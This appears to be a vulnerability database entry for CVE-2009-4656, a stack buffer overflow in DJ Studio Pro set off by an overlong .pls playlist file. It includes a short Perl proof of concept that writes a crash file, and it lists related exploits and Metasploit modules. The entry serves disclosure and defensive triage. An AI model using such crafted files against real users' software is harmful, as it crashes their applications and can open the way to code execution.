CVE-2009-4656

critical
Published 2010-03-03 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
10.0

Description

Stack-based buffer overflow in E-Soft DJ Studio Pro 4.2 including 4.2.2.7.5, and 5.x including 5.1.4.3.1, allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a playlist file (.pls) containing a long string. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9691 dos windows verified perl · 1 KB
prodigy · 2009-09-15

DJ Studio Pro 4.2 - '.pls' Local Crash

perl exploit Source: Exploit-DB
#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
# 
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.pls";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-09-15]

EDB-18547 local windows verified
Metasploit · 2012-03-02

DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)

EDB-18501 local windows
Death-Shadow-Dark · 2012-02-20

DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)

EDB-10827 local windows verified
Sébastien Duquette · 2009-12-30

DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)


Metasploit modules

DJ Studio Pro 5.1 .pls Stack Buffer Overflow

Application impact

Vendor     Product        Versions   Fixed
e-soft.co  dj_studio_pro  4.2
e-soft.co  dj_studio_pro  4.2.2.7.5
e-soft.co  dj_studio_pro  5.1
e-soft.co  dj_studio_pro  5.1.4.3.1

References

CWEs

CWE-119
